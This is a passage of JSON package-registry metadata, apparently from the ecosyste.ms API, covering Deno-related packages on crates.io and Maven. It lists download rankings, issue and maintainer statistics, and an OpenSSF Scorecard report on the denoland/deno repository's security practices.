//repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T21:30:07.559Z","dependent_packages_count":0,"downloads":52628,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":42.08426401840058,"dependent_repos_count":17.07132680061644,"dependent_packages_count":22.5632121360655,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":27.239600985027508},"purl":"pkg:cargo/deno_inspector_server","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_inspector_server","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_inspector_server","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_inspector_server/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_inspector_server/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_inspector_server/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_inspector_server/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_inspector_server/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_inspector_server/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_inspector_server/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-02-28T00:36:04.720Z","updated_at":"2026-02-28T00:36:04.720Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-02-28T00:36:04.781Z","updated_at":"2026-02-28T00:36:04.781Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":12600317,"name":"org.mvnpm.at.deno:darwin-arm64","ecosystem":"maven","description":"darwin-arm64 distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"org.mvnpm.at.deno","versions_count":19,"first_release_published_at":"2025-10-20T11:26:26.000Z","latest_release_published_at":"2026-08-29T02:09:39.000Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-07T22:56:27.381Z","created_at":"2025-12-18T17:01:25.222Z","updated_at":"2026-09-07T22:56:27.381Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.deno/darwin-arm64/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.deno/darwin-arm64/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / 